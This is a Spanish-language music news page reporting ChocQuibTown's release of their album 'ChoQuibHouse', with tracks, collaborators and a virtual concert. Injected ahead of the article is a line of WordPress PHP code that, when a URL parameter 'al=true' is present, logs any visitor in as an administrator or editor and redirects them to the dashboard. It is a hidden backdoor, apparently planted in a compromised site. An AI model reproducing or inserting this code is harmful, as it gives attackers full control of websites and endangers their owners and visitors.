// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Desde casa, ChocQuibTown lanza su nuevo álbum - Dicomania Tu Manía
MusicManía

Desde casa, ChocQuibTown lanza su nuevo álbum

La banda colombiana lanzó oficialmente su sexto álbum «ChoQuibHouse», que presentarán en un concierto virtual a través de la plataforma YouTube a las 7:30 pm, hora Colombia.

El álbum, que tiene como tema principal «Vuelve», viene acompañado de colaboraciones con grandes artistas del género urbano como  Dalex, Zion, Lyanno, Rauw Alejandro y Manuel Turizo, entre otros.

Este sexto álbum estará compuesto por 12 canciones, entre las que están ‘Fresa’, ‘Humano’, ‘Que Me Baile’ Ft. Becky G, ‘Pa´Olvidarte’ y ‘Pa´ Olvidarte remix’ Ft. Manuel Turizo, Zion & Lennox y Farruko, canción que cuenta con más de 105 millones de views en YouTube.

Advertisements

‘Vuelve’ el sencillo con el que sale a la luz este álbum, es una emotiva canción que viene acompañada de un videoclip que refleja la distancia, muy acorde a la situación que se vive actualmente a causa del COVID-19.

‘De nuestra casa para todo el pueblo’ es la premisa de esta producción, así mismo, el mensaje por parte de Chocquibtown es: “la música es la mejor terapia y vía para sobrellevar duros momentos”.

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

To Top